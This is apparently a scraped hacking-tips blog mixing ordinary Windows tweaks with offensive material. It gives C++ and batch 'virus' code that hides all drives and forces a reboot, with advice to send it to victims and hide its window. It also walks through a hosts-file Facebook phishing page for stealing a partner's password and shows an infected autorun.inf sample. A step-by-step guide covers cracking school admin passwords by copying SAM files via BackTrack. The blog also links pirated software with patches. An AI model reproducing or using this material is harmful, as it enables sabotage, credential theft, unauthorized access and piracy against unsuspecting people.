How to disable writing to USB?

If you are the administrator of public cafe or school,this trick will be helpful for giving protection to your system.  You can disable writing to USB.  This will prevent from file stealing.  You have to login to administrator so that you can access regedit.

Go to start .  Select run.

Type as regedit and hit enter
Now navigate to

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies
 In right panel you can find writeprotect and
Change the value to 00000001


That's all now no  one can transfer data to USB.  Now your system is protected.

C++ ,Batch Virus code to disable All Hard disk

Hi friends,here i give you give the C++ virus code.  Actually Batch code is converted to C++ virus code.  If you like you can use it as batch code also.

C++ Virus Code :


#include < windows.h >
#include < fstream.h >
#include < iostream.h >
#include < string.h >
#include < conio.h >
int main()
{
ofstream write ( "C:\\WINDOWS\\system32\\HackingStar.bat" ); /*opening or creating new file with .bat extension*/

write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n"; write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n"; write<<"shutdown -r -c \"Sorry Your System is hacked by us!\" -f"<<"\n"; write.close(); //close file ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\HackingStar.bat ",NULL,NULL,SW_SHOWNORMAL); return 0; }


Copy the above code and paste in notepad
Save the file with .cpp extension
Compile and create .exe file in cpp
Note:
Don't run this c++ program ,it will attack your system itself.
Copy the created .exe file and send it to your victim. You can also attach it with any other
exe files.


Batch Virus Code Creation:

REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n

REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n

shutdown -r -c \"Sorry Your System is hacked by us!\" -f

I think this code will simple for non c++ programmers. It is easy to create the batch file also.
Copy the above code to notepad.
Save it with .bat extension (for ex: nodrivevirus.bat)
Send the file to your victim

How to hide the windows while running the virus code?

This day will be great day!  Because The Brain Hackers get top rank in blogger directories. 

Now i am going to introduce a new tool called as "CMDOW" .   When you create and send virus to victim, the virus running process may be shown to victims.  This tool will hide that also.

About Cmdow
Cmdow is a Win32 commandline utility for NT4/2000/XP/2003 that allows windows to be listed, moved, resized, renamed, hidden/unhidden, disabled/enabled, minimized, maximized, restored, activated/inactivated, closed, killed and more.

Cmdow is 31kb standalone executable. It does not create any temporary files, nor does it write to the registry. There is no installation procedure, just run it. To completely remove all traces of it from your system, delete it.

Cmdow was written with batch file programmers in mind. Particular attention has been paid to Cmdows output making it easy to process with the 'FOR /F' command found in NT4/2000/XP/2003.


For more details and Download from here:

How to Open Microsoft 2007 file in Microsoft 2003

It may big issue to open the Microsoft 2007 files in microsoft 2003. But it is easy to open the file in Ms 2003. You have to download the MS2007 compatibility pack for Ms2003.

Download it from here:

http://www.microsoft.com/downloads/details.aspx?FamilyId=941b3470-3ae9-4aee-8f43-c6bb74cd1466&displaylang=en

Enjoy...!!!

Suggestion:
Better start to use Ms 2007.
Old is gold but New is Diamond..!!!


Local Facebook Phishing WebPage-change the name of your localhost

This post is not about hacking. It just windows tweak or trick.
Just change your localhost name and enjoy it.

You have to well know about this:
How to use wamp/xamp server.
What is localhost.



It is very simple to follow. This is for windows users only.

Steps to follow:
1.Go to C:\WINDOWS\system32\drivers\etc
2. Find the file named
HOSTS
3.Open the file with notepad.
4.you can see there like this:
127.0.0.1 localhost

5.Change the localhost to anything you like.
For ex: you can change it to "www.facebook.com".
6. save the file

Now start the wamp or xamp server and enter the www.facebook.com in browser
you will see the localhost homepage.

Why not?-You can hack your friends.
I have told that this is not hacking trick. But you can use this also for hacking your friend/lover.(in tamil "siru thrumpum pal kutha uthavum", i don't know how to say it in english)

Do you know how?
As i said change the localhost to www.facebook.com.
change your localhost homepage as facebook or gmail phishing web page.
So now the local phishing webpage is ready to hack your friend/lover/spouse(sounds crazy ?)
if he enter the www.facebook.com in your pc. He can see your local phishing page only.
so their passwords is in your hands.
Try some "under construction " or anyother error message so that they will not suspect you.

Note: Actually i just give idea only. If you think that you can become funny and best hacker,then add your own ideas and hack them.

Hacking Autorun.inf virus attack|Is autorun.inf virus?



When i  studied second year(cse), my friends told that autorun.inf is virus.  I thought so.  Because my antivirus blocks autorun.inf files.   In third year when i search about autorun.inf file in net, i realize about the auto run file.

 Today i bring some files from my college system.  When i insert the pen drive in my system, there are lot of exe files.They are viruses.  I delete all of them.  Finally i opened the autorun.inf file in notepad and saw the instructions.  Then only i remembered that i forget to post about autorun file.  This article will give you complete details about the autorun.inf file.
This is the instructions that saved in the infected(call virus programs) autorun.inf file:
[Autorun]
Open=RECYCLER\QqFvXcB.exe
Explore=RECYCLER\QqFvXcB.exe
AutoPlay=RECYCLER\QqFvXcB.exe
shell\Open\Command=RECYCLER\QqFvXcB.exe
shell\Open\Default=1
shell\Explore\command=RECYCLER\QqFvXcB.exe
shell\Autoplay\Command=RECYCLER\QqFvXcB.exe



is autorun.inf virus file?  no.  Then why antivirus block the autorun.inf files?  Go ahead to know the full details about auto run file.

Introduction to Autorun.inf File:
Auto run is file that triggers other programs,documents ,other files to be opened when the cd or pen drives are inserted.  Simpy triggers.

When cd or pen drives are inserted, windows will search for the autorun.inf file and follow the instructions of autorun.inf file(instructions have written inside the autorun.inf file).

How to create Autorun file?
Open notepad
type this command:
[Autorun]
save the file as "autorun.inf" (select all files, not text )

Complete Syntax and instructions inside the Autorun file:
Basic syntax must be inside  the autorun.inf file is :
[Autorun]
This will be used to identify the the file as autorun.

OPEN=
This will specify which application should be opened when the cd or pen drive is opened

Example:
open=virus.exe
This will launch the virus.exe file when cd or pen drive is opened.  The file should be in root directory.
if the file is in any other sub directories ,then we have to specify it.
Open=RECYCLER\Virus.exe
Explore=
Nothing big difference. if you right click and select explore option in cd or pen drive.  This command will be run.

AutoPlay=
Same as the above , but it will launch the the program when auto played.


SHELL\VERB =

The SHELL\VERB command adds a custom command to the drive's shortcut menu. This custom command can for example be used to launch an application on the CD/DVD.

Example:

shell\Open\Command=RECYCLER\QqFvXcB.exe
shell\Open\Default=1
shell\Explore\command=RECYCLER\QqFvXcB.exe
shell\Autoplay\Command=RECYCLER\QqFvXcB.exe



Use a series of shell commands to specify one or more entries in the pop-up menu that appears when the user right-clicks on the CD icon. (The shell entries supplement the open command.)

Icon=
Change the icon of your pen drive or cd.  you can use .ico,.bmp images(also .exe,.dll)

Example:
icon=breakthesecurity.ico
Label=

Specifies a text label to displayed for this CD in Explorer
Note that using the LABEL option can lead to problems displaying the selected ICON under Windows XP.

Example:
Label=Ethical hacking


Why Antivirus Block Autorun.inf file?
From above ,you come to know that autorun.inf file is not virus.  But why antivirus blocks it?  Because as i told autorun file call or launch any application or exe files.  It will lead to virus attack.  If the autorun.inf is blocked,then there is no way to launch the virus code.

Autorun is not virus but it can call virus files.

How to block or Disable Autorun.inf file in windows xp,Windows 7-Registry Edit

Brain Hackers

Depending on the version of Windows that you are using, there are different updates that you must have installed to correctly disable the Autorun functionality:
To disable the Autorun functionality in Windows XP, in Windows Server 2003, or in Windows 2000, you must have security update 950582, update 967715, or update 953252 installed.



Simple way to disable autorun.inf :
Follow this link and download the msi file:
http://go.microsoft.com/?linkid=9741395

Fix it yourself-Manually disabling the autorun feature:
To disable Autorun yourself on operating systems that do not include Gpedit.msc, follow these steps:
Click Start, click Run, type regedit in the Open box, and then click OK.
Locate and then click the following entry in the registry:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDrive

TypeAutorun
Right-click NoDriveTypeAutoRun, and then click Modify.
In the Value data box, type 0xFF to disable all types of drives. Or, to selectively disable specific drives, use a different value as described in the "How to selectively disable specific Autorun features" section.
Click OK, and then exit Registry Editor.
Restart the computer.

you can re-enable the autorun feature :
Follow this link:
http://go.microsoft.com/?linkid=9743275

Actually i get this information from here:
http://support.microsoft.com/kb/967715
if you want more information  or want to disable in vista, just visit the above link:

Disable the Error Report in Windows XP





Are you getting often error report in windows xp? this trick will disable the error report creation.


  • Right-click My Computer and choose Properties.
  • Click the Advanced tab on your System Properties dialog box.
  • Click the Error Reporting button on the Advanced tab.
  • Place a checkmark next to "Disable error reporting."
  • Leave the other radio button unchecked next to the text labeled, "But notify me when critical errors occur."
  • Click OK.
that's all you finished.  From now error reports will not disturb you.

How to Disable the Thumb.db file creation?

What is Thumb.db?
when you view a image contained folder in thumbnail view,thumb.db file will be created.  It is is a cache of the current picture in that directory.to remove it go for following
 open "WINDOWS EXPLORER".
go to "TOOLS".
open "FOLDER OPTIONS".
go to "VIEW".
see 1st section "FILES & FOLDERS".
click on the "DO NOT CACHE THUMBNAILS".


How to Make your Web cam as Security/Surveillance Camera?

Using some softwares you can change your web camera as spy or Surveillance camera.  here i give you some  softwares links.



Rise Sun(Complete  Free Software)
  • Adjustable Motion Detection Sensitivity
  • Adjustable Webcam Performance
  • Automatically takes a snapshot when movement is detected
  • Automatically logs a record when movement is detected
  • Automatically sounds an audible alarm when movement is detected
  • Automatically displays a silent message when movement is detected

Screen Shots:


Download:
http://www.brothersoft.com/rise-sun-96797.html


TeboWeb(Freeware)

  • Set the sensitivity of movement detection.
  • Detection motion within or outside a specified area .
  • Receive emails with images of any movement detected.
  • Publish movement images to your website.
  • Publish webcam images at regular intervals.
  • Timestamp your images (choice of colours and position within image)
  • Graph of movement over time (with calendar facility).
  • Start movement detection at a specified time.
  • Command line startup options.
  • Save your individual settings to different profiles.
  • Receive notification of new versions as they become available.
  • New versions autoinstall on one mouseclick(so you only need to install TeboCam once).    
Screen Shots:


Download:
http://www.teboweb.com/TeboWebDownload.html

Shortcut commands to open windows Programs faster

Here i give you list of shortucut commands to open the windows program faster.  If you practice the shortcut ,then you will access the windows default programs much better than any others.  you can impress your friends/lover or any others.  No need to try all shortcuts commands, just try for frequently accessed programs.


Just press CTRL+ R and type the command and press enter.
or
Just go to Run and type "cmd" and then write the Shortcut commands to open windows Programs faster.

Here is the Shortcut commands for you:

appwiz.cpl  ----> Add/Remove Programs
access.cpl  ----> Accessibility Controls



hdwwiz.cpl  ----> Add Hardware Wizard

 control admintools   ----> Administrative Tools
 wuaucpl.cpl   ----> Automatic Updates

 fsquirt   ----> Bluetooth Transfer Wizard
 calc   ----> Calculator

 certmgr.msc   ----> Certificate Manager

 charmap   ----> Character Map

 chkdsk   ----> Check Disk Utility

 clipbrd   ----> Clipboard Viewer

 cmd   ----> Command Prompt

 dcomcnfg   ----> Component Services

 compmgmt.msc   ----> Computer Management

 control panel   ----> Control Panel

 timedate.cpl   ----> Date and Time Properties

 ddeshare   ----> DDE Share

 devmgmt.msc   ----> Device Manager

 directx.cpl   ----> Direct X Control Panel

 dxdiag   ----> Direct X Troubleshooter

 cleanmgr   ----> Disk Cleanup Utility

 dfrg.msc   ----> Disk Defragment

 diskmgmt.msc   ----> Disk Management

 diskpart   ----> Disk Partition Manager

 control desktop   ----> Display Properties

 desk.cpl   ----> Display Properties

 control color   ----> Display Properties

 drwtsn32   ----> Dr. Watson System Troubleshooting Utility

 verifier   ----> Driver Verifier Utility

 eventvwr.msc   ----> Event Viewer

 sigverif   ----> File Signature Verification Tool

 findfast.cpl   ----> Findfast

 control folders   ----> Folders Properties

 control fonts   ----> Fonts

 fonts   ----> Fonts Folder

 joy.cpl   ----> Game Controllers

 gpedit.msc   ----> Group Policy Editor

 iexpress   ----> Iexpress Wizard

 ciadv.msc   ----> Indexing Service

 inetcpl.cpl   ----> Internet Properties

 Iexplore   ----> Internet Explorer

 ipconfig /all   ----> IP Configuration (Connection Configuration

 ipconfig /displaydns   ----> IP Config (Displays DNS Cache Contents

 ipconfig /flushdns   ----> IP Config (Delete DNS Cache Contents

 ipconfig /release   ----> IP Config (Release All Connections

 ipconfig /renew   ----> IP Config (Renew All Connections

 ipconfig /registerdns   ----> IP Config (Refresh DHCP & Re-Registers DNS

 ipconfig /showclassid   ----> IP Config (Display DHCP Class ID

 ipconfig /setclassid   ----> IP Config (Modifies DHCP Class ID

 jpicpl32.cpl   ----> Java Control Panel (If Installed

 javaws   ----> Java Control Panel (If Installed

 toy.cpl   ----> Joystick Properties (If Installed

 control keyboard   ----> Keyboard Properties

 main.cpl keyboard   ----> Keyboard Properties

 secpol.msc   ----> Local Security Settings

 usrmgr.msc   ----> Local Users and Groups

 logoff   ----> Logs You Out Of Windows

 winchat   ----> Microsoft Chat

 winmine   ----> Minesweeper Game

 control mouse   ----> Mouse Properties

 main.cpl   ----> Mouse Properties

 control netconnections   ----> Network Connections

 ncpa.cpl   ----> Network Connections

 netsetup.cpl   ----> Network Setup Wizard

 notepad   ----> Notepad

 nvtuicpl.cpl   ----> Nview Desktop Manager (If Installed

 packager   ----> Object Packager

 odbccp32.cpl   ----> ODBC Data Source Administrator

 osk   ----> On Screen Keyboard

 acfilter.cpl   ----> Opens AC Filter (If Installed

 password.cpl   ----> Password Properties

 perfmon.msc   ----> Performance Monitor

 perfmon   ----> Performance Monitor

 telephon.cpl   ----> Phone and Modem Options

 powercfg.cpl   ----> Power Management

 control printers   ----> Printers and Faxes

 printers   ----> Printers Folder

 eudcedit   ----> Private Character Editor

 QuickTime.cpl   ----> Quicktime (If Installed

 intl.cpl   ----> Regional Settings

 regedit   ----> Registry Editor

 regedit32  ----> Registry Editor

 mstsc   ----> Remote Desktop

 ntmsmgr.msc   ----> Removable Storage

 ntmsoprq.msc   ----> Removable Storage Operator Requests

 rsop.msc   ----> Resultant Set of Policy (XP Prof

 sticpl.cpl   ----> Scanners and Cameras

 control schedtasks   ----> Scheduled Tasks

 wscui.cpl   ----> Security Center

 services.msc   ----> Services

 fsmgmt.msc   ----> Shared Folders

 shutdown   ----> Shuts Down Windows

 mmsys.cpl   ----> Sounds and Audio

 spider   ----> Spider Solitare Card Game

 cliconfg   ----> SQL Client Configuration

 sysedit   ----> System Configuration Editor

 msconfig   ----> System Configuration Utility

 sfc /scannow   ----> System File Checker (Scan Immediately

 sfc /scanonce   ----> System FC (Scan Once At Next Boot

 sfc /scanboot   ----> System FC (Scan On Every Boot

 sfc /revert   ----> System FC (Return to Default Setting

 sfc /purgecache   ----> System FC (Purge File Cache

 sfc /cachesize=x   ----> System FC (Set Cache Size to size x

 sysdm.cpl   ----> System Properties

 Taskmgr   ----> Task Manager

 nusrmgr.cpl   ----> User Account Management

 utilman   ----> Utility Manager

 explorer   ----> Windows Explorer

 firewall.cpl   ----> Windows Firewall

 magnify   ----> Windows Magnifier

 wmimgmt.msc   ----> Windows Management Infrastructure

 syskey   ----> Windows System Security Tool

 wupdmgr   ----> Windows Update Launches

 winver   ----> Windows Version

 tourstart   ----> Windows XP Tour Wizard

 Write   ----> WordPad
Example:
If you want to open the "Add or Removal Program",just press Ctrl+R and type as "appwiz.cpl" in run box and press enter.
Likewise for opening wordpad just type "write".

List and save the directory's name in text file

The Fastest Way of searching the directory in windows

This computer trick will save the all sub directory and file names in text file.  This may helpful to analyse the direcotry(you can know what are the contents inside the window without browsing by simple commands).


Step 1:
First of all open command Prompt.
Step 2:
Browse to folder which you want to analyze the sub directories and files by using cd commands. For Example if you want to visit d:/interview folder then
try this command.
Type "d:"
then "cd interview".
Step 3:

after navigate to direcotry in command prompt,
Type this command :
dir *.* /s /b > dirlist.txt
and hit enter.
This will list all sub directories and files with their extension.

If you want to list only pdf files just use this command
dir *.pdf /s /b > dirlist.txt
Likewise, if you want to search only microsoft word files then use this command.
dir *.doc /s /b > dirlist.txt
If you want to search and list only files that has some certain name. For example, Resume.doc then try this command
dir Resume.* /s /b > dirlist.txt
(or)
dir Resume.doc /s /b > dirlist.txt

Step 4:
you can find the dirlist.txt file in that directory. i mean it will d:/interview directory.

Step 5:
open the text file in notepad or notepad++ ,then search your desired file name or folder(for example "resume"),you will get the full path to the file. This is fastest search than the usual windows search.

 Note: Don't waste your time, use this computer trick to search the drive or folder faster.
Hope you understand the trick. This is fastest way of browsing the folder . if you have any doubts ,feel free to ask me. I will answer if i am able to. Don't spam!

How to Create Con Folder in windows using Cmd?|Brain Hackers

we all know that can't create con folder in windows

Here is simple trick to create con folder in windows using Command Prompt.

Step 1:
Open Command Prompt(Start->run->cmd)
Step 2:
Type this command:
md \\.\d:\con
This will create con folder in D Drive.
Step 3:
To Remove the folder type this command
rd \\.\d:\con
This will remove con folder from D Drive

How we are able to create the con and other folder using this trick?

It is just because of the UNC Path (Universal Naming Convention). The Universal Naming Convention, or UNC, specifies a common syntax to describe the location of a network resource, such as a shared file, directory, or printer.Since, these conventions did n't exist under pure DOS, they are not backward compatible. The UNC syntax for Windows systems is as follows..

\\RemoteHost\sharedfolder\resource

where RemoteHost is the computer name / IP address of the computer that you wish to connect through remotely for accessing shared folder. The rest is the path.

(Here \\remotehost\drive:\con doesn't make sense anyway, because without having a process on the remote host, there is no current 'console'). It would be a security hazard as well, having the serial and parallel ports accessible for everyone who is allowed to read or write in any single directory.

The "." in the command \\.\c:\con suggest the local server. Now, you are pointing to your own computer. since, you have all privilages on every folder of ur computer, you can easily create it.

why can not we create con folder in windows?

A Reason Behind the Con Folder Creation in Windows

We all know that we can't create Con, Folder in windows. not only con but also " PRN, AUX, CLOCK$, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, LPT9 and more".

Here i am going to explain why you can not create the con folder in windows.

Reason:

We can not create folder with con,aux, nul because these are reserved keywords used by DOS. so if u r allowed to create such folders, there will be an ambiguity in where to write data when the data is supposed to go to the specified devices. In other words, if i want to print something, internally what windows does is -- it will write the data to the folder prn (virtually u can call it a folder, i mean prn, con, etc are virtual folders in device level). So if we are able to create con folder, windows will get confused where to write the data, to virtual con folder or real one.

Keywords and Their corresponding Functions:
Reserved KeywordsFunction
CONKeyboard and Display
PRNSystem list device, usually a parellel port
AUXAuxiliary Device,usually a serial port
NULBit-Bucket Device
A:-Z:Drive Letter
COM1First Serial communications port
COM2Second Serial communications port
COM3Third Serial communications port
COM4Fourth Serial communications port
LPT1First Parallel printer port
LPT2second Parallel printer port
LPT3Third Parallel printer port


How to hack the Windows 7 or Vista passwords-Become a hacker

Hi Brain Hackers Friends,
"How to Hack windows admin?" This will teach you how to hack the windows password. You can use the above tutorial for hacking any type of windows Operating system. For Example: you can hack the latest Windows 7 also.

There is only one change is required to do. i.e., You have to choose the correct Rainbow table corresponding to the Operating system that you are going to hack.

You can get all type of rainbow table from here:

http://ophcrack.sourceforge.net/tables.php

Hacking Windows XP

If you are going to hack the windows xp accounts(usually admin) password. Then you have to download the XP free fast (703MB) rainbow table.

Hacking Windows 7 or Windows vista

We all know that windows 7 is upgraded version of Vista. So the same rainbow table is used.(because same type of Hash code created by both).
So You have to download the Vista free (461MB) rainbow table.

How ophcrack tool impressed me?
Recently i have tested this tool in my system. In order to test , i create new account with "secure123" password. When i click the crack button, i got the password within seconds. I know this is weak password. So i thought it is not big issue to crack this silly password.

But when i try with my friend system, i am really impressed. Do you know why? He put the strong password for his windows 7 os( a password with upper&lower case combination,Special character,numbers). Because the ophcrack takes less than 1 seconds to crack this password. It is so interesting how the design this wonderful software.

How to Hack the Windows Admin Password Using OphCrack in Backtrack tutorial


If you are School/College/University students, you may curious to hack the admin password in your college or school system. This post is going to help you to crack the any type of windows accounts passwords. Learn how to hack the windows admin password like a geek.


Requirements:
  • BackTrack Linux 4 or 5. Download it from http://backtrack-linux.org
  • Two Pen drives [if you are going to test in your own system, one pen drive is enough]
  • Xp Free Fast RainBow table [tables_xp_free_fast.zip]. Download it from here:http://ophcrack.sourceforge.net/tables.php

Install the Backtrack Linux in one pen drive. Leave another pen drive as empty.

Step 1: Booting From Back Track
Insert the Backtrack installed  pen drive in target computer[when turned off].  We are going to boot the operating system from pen drive, so insert when the system is turned off.
Now Turn on the system.
Press F10 [boot menu, differs for system]  before booting and select boot from Pen drive. 
Now it will boot the Backtrack.
Select "Graphical User Interface "
Now wait for a while ( it will execute some commands}
Now you can see the "root:"
type "startx" and hit enter.  It will bring you to the GUI view of Backtrack.

Step 2:Copy the SAM and System files
Click the  Start button(dragon symbol)
Select System Menu
Select Storage Media(if you see nothing, close the window open it again).

You can see the list of Hard disk and Your pen drive.
Open the windows installed Hard disk and Navigate to this path:
WINDOWS/system32/config/

There you can see two files named as "SAM" and "System". 

Copy the both SAM and system files.
[ Just proceed to next step without closing the window]

Step 3:Insert your Empty Pen Drive
Now again go to System Menu->Storage Media
Open Your pen drive(Empty Pen drive) ,Create a new folder and paste the sam and system files inside that folder

[note: you may not paste into your backtrack installed pen drive. that's why i asked you to bring 2 pen drives.  If you testing in your system, then you can copy to any other hard drive.]

You can not directly copy the sam and system files from same operating system. That's why we are using Backtrack.

Step 4:Now go to your home.
Boot into windows.  Extract the "tables_xp_free_fast.zip" in any hard drive.
Copy the folder that contains sam and system files from your pen drive.
Paste in any hard drive.
---
Restart the windows.
Insert the Backtrack installed pen drive and boot from Pen drive.

Step 5: Mounting the Hard drive in Backtrack

Now  go to System Menu->Storage Media(if you see nothing, close the window open it again).
and open the hard drives that contains sam files and rainbow tables. Then close it.

Don't be confused. I asked you to open those hard drive for mounting purpose. In linux , it won't mount automatically until you open the drive

Step 6: Run OphCrack Tool in Backtrack
Open the ophcrack GUI(start->Backtrack->Privilege Escalation->Password Attack->offline Attacks-ophCrack GUI).

Ophcrack GUI application will run now.

Step 7: Loading the folder that contains sam and system files

Click the Load and select "Encrypted SAM" in ophcrack tool.
Now it will ask you to select directory that contains SAM folder.
 
[Select Computer in file selecting window.  click '/'  browse to /media/your_Hard_Disk]
 Select the directory(don't open the directory, just select it).

Now it will load and display the list of user accounts in the windows.

Step 8: Target the Admin Account
Here i am going to hack the one of the administrator account "secure" of my computer.
So remove all other accounts except the target admin account.[This is not necessary, but it will increase the cracking speed] by clicking delete button.

Step 9: Install the Rainbow Table
Now let us install the Rainbow table.
Click the Table button in ophcrack tool.
Now it will ask you to selec the table. 
we are going to crack windows password right?. So choose the first one. and click the install button.
[note: i have installed the rainbow table already.  So it showing green.]

Now browse to the Rain bow table directory. I mean to the "tables_xp_free_fast" folder.
[here also, don't open the foler, just choose it]

now click ok.


Step 10: Cracking Begins
Click the Crack button.
Wait for a while [ophcrack is the fastest cracking tool. so it won't take too much time]

Step 11: Password is cracked
Yes..!! we got the password.  Now go to your school/college and login with that password.
Enjoy.  Don't forget to share with your friends.  This is interesting one na..!
Actually i missed the fun.  I didn't know this hack when i study in college. if i know that time itself,
i may have fun with my college system. 

Using Backtrack Installed CD Or single Pen drive:
You will need only one pen drive, if you are going to hack the admin password in the target system itself. Don't forget to bring the rainbow table in your backtrack pen drive in this case.


you can use cd instead of Pen drive for backtrack installation.
If you use cd, you can not bring the SAM file to your home. You have to crack it in that computer itself

How to Clear/Flush DNS cache in Linux/Windows/Mac OS?


If a website newly registered in internet world, it may not be loaded in your computer.  For example, you register for example.com yesterday, still you may not see your web page. This is problem of DNS cache.  Your local DNS cache is old one so it won't know the newely available domain names.  Sometime you may update the NS records of your domain to point to new hosting service.

In these case you have to clear or flush cache in your computer.



How to Flush cache in Windows?

  1. Open Command Prompt(Start->Run , type cmd and hit enter).
  2. In command promt type
    ipconfig /flushdns
  3. hit enter
Your DNS cache is cleared now, try to load your new website.

How to Clear Cache in Linux?
First of all you have to install nscd . (only 250kb).
Open terminal and type
sudo apt-get install nscd 
Type this command to restart the DNS cache server in Linux:
sudo /etc/rc.d/init.d/nscd restart

How to Clear Cache in Mac Os?
Open the Terminal
Type the following command:
dscacheutil -flushcache


How to Re-Enable Task Manager,System Restore,cmd,run,Registry?

Hi friends, today i faced a problem.  A virus attacked my XP. I was unable to use Task Manager, System Restore,cmd,run,Registry.


This malware disabled important windows features(task manager, system restore,.......)


Whenever i try to open the Task Manager, it pop this error message as " Task Manager is Disabled by Administrator. Contact admin" .

When i try to use System restore "it said restore is turn off. it is disabled by administrator".

So i started search in Internet , finally i found the solution.  If you have this problem,
Don't get panic.  I will help you to fix this problem because i faced this problem.(Experience man..!!!)



How to Fix  this?
Here is one software that will fix this problem with a single click.

Download TangoSoft Software from here:
http://www.tangosoft.co.uk/downloads.html
The program has the ability to restore functionality to these Windows features:
  • Windows Registry
  • Command Line Tool
  • Windows Task Manager
  • System Restore Config
  • Folder Options
  • Run command
  • My Computer
  • Task Scheduler
  • Right Click Context menu
  • Ms-Config (Xp only)
  • Control Panel
  • Search


  • You can download portable version but it is 22Mb.  So download the instller(only 1mb).
  • Install the Tangosoft
  • Run the Application
  • Click the "Re-Enable" button.
  • It will ask you to restart.
That's all your problem is fixed.
Now my system working finely.
Note: After problem is fixed, try to install good antivirus like Kaspersky.


Realplayer Gold plus 11 for Free Download Full Version

Realplayer Gold plus 11

Real Player Gold Plus 11: The best media player for watching, downloading, converting & organising your videos.
Real Player Gold Plus 11 Gives You the Ability to download videos from Thousands of Web sites with just one click, and even now You Can Burn Them to CD. Watch Them Whenever and wherever you want. Download Internet videos with one click, build your own video library and playlists, or burn your favorite videos to CD or DVD with RealPlayer. RealPlayer plays all major audio and video formats.

Real Player Gold Plus 11 is the new version of one of the most respected multimedia players the Internet, RealPlayer. After all, who never met a file in RM or RMVB? Of course, these formats have lost some popularity because of the evolution and rise of other codecs, however RealNetworks still bet on disclosure of your player to stay well in the market.
In eleventh version, RealPlayer finally allows competing formats to be played, such as Flash videos and extension MOV, QuickTime. Courage to sail the seas enemies or just a question of survival? Only the future can tell, but the decision is bold.

Note:
This is WinRAR file. You must be install WinRAR on your system. For Downloading WinRAR Click Here



                          
                                             Download the file Click Here

Password of RAR File : brain hackers


SPAMfighter 7.5.149 for Free Download Full Version

SPAMfighter 7.5.149

SPAMfighter works with Microsoft Outlook and Outlook Express. Spam is identified with a list from other users. Every time you mark a message as spam everybody else with SPAMfighter has it automatically marked and deleted.

You can create a whitelist with SPAMfighter so that emails from people in your address book will always get through.


The SPAMfighter website has a running total of the number of emails processed and the new users who have joined the group.

SPAMfighter is free for home users. Note that there is a Professional version available which offers even more protection, such as an advanced filter, the ability to remove the Spamfilter footer added to your outgoing emails, commercial support and much more.
Platform: Windows Vista 64-bit, Windows 7, Windows 7 64-bit, Windows Vista, Windows XP


Note:
This is WinRAR file. You must be install WinRAR on your system. For Downloading WinRAR Click Here



                          
                                             Download the file Click Here

Password of RAR File : brain hackers


CuteFTP 8 Professional for Free Download with Patch Full Version

CuteFTP 8 Professional for Free Download

Cute FTP 8 Professional-Cute FTP Professional is a powerful FTP client for Windows. It enables you to connect and transfer files securely using SFTP (Secure Shell/SSH), FTPS (Secure Socket Layer (SSL) over FTP) and one-time passwords. You can transfer files quickly using CuteFTP Professional's multipart transfer and simultaneous connections. Easily manage and maintain your Web site with the built-in HTML editor, as well as the Folder Synchronization, Folder Monitor, Site Backup, and Compression tools.
Cute FTP Professional also lets you schedule, automate, and prioritize transfers using a transfer queue.
Intelligently and securely move your important files across multiple locations and over the Internet.
Whether for use at home or at the office, the industry-leading CuteFTP software family lets you intelligently and securely move your important files across multiple locations and between various contacts over the Internet. CuteFTP Professional is the right choice when you want the ultimate in power, performance and security. CuteFTP Home makes it easy to publish web pages, download the latest music, images, or software, or transfer files between your home and office. CuteFTP Mac Pro is the most advanced Mac FTP client available. And, for those of you who just want the basics, check out CuteFTP Lite, a solution with all of the basic features you need to quickly and easily finish your file transfer task.

1. Extract Data with WinRAR
2. Install cuteftppro
3. Go to Patch Folder and Run Patch
Enjoy

Note:
This is WinRAR file. You must be install WinRAR on your system. For Downloading WinRAR Click Here



                         
                                             Download the file Click Here

Password of RAR File : brain hackers


Registry Booster 2012 for Free Download Full Version with Serial Key

Registry Booster 2012 for Free Download

Registry Booster 2012 is the easy answer to all your Windows registry problems. This award winning software starts by conducting a deep scan of your registry, checking for file extension errors and other registry conflicts. Registry Booster 2012 will then repair or remove unused, corrupted and harmful files so optimizing your PC̢۪s performance. You can then use regular scans to keep you registry structured and your PC speeding along at peak efficiency.


With RegistryBooster you̢۪ll see immediate increases in performance and decreases in system conflicts. RegistryBooster is the safest and most trusted solution to clean and optimize your system, freeing it from registry errors and fragmented entries. Using advanced error detection technology, RegistryBooster automatically identifies missing, corrupt or possibly harmful items in your Windows registry, dramatically enhancing performance and general stability.

Have you noticed that the longer you have your computer, the slower it runs and the more it crashes? Often this is because whenever you install or uninstall software, add or remove hardware, or change your computer̢۪s settings, the Windows registry is updated. These changes can leave the registry fragmented, with obsolete, corrupted and, in some cases, harmful files. Over time the registry starts to get bogged down and conflicts emerge. Left unchecked, your system will become increasingly unstable, run more slowly and crash more frequently.

One mouse click and our registry cleaner does the rest. And using RegistryBooster regularly keeps your PC free from errors and from obsolete, unused or unwanted files. RegistryBooster is trusted by specialist IT technicians and home PC users around the world to solve all their registry based performance problems.
Clean Your System and Boost Performance. Boost system performance by cleaning out all missing, unwanted, obsolete and corrupt registry entries automatically with RegistryBooster.
 Repair Your PC and Keep It Tuned. Dramatically improve your computing experience by repairing all registry problems and minimizing application seizures and crashes.
 Exceptionally Simple to Use. Set in a highly intuitive, attractive, logical and user-friendly graphical user interface, Uniblue's registry cleaner sets the standard for ease-of-use.
 More Scanning Options. Due to the improvements made to the scanning engine you are now able to scan for more sections within the registry.
 An Ignore List. This is quite an innovative feature and very useful for those users who are extra cautious with their registry. By specifying the registry section and path the user will be able to exclude registry parts from the scan.
 Log Generation. Displays a transcript of all the actions performed on the registry by a particular fix operation. Especially helpful for those users wanting to know what has been done to their registry.
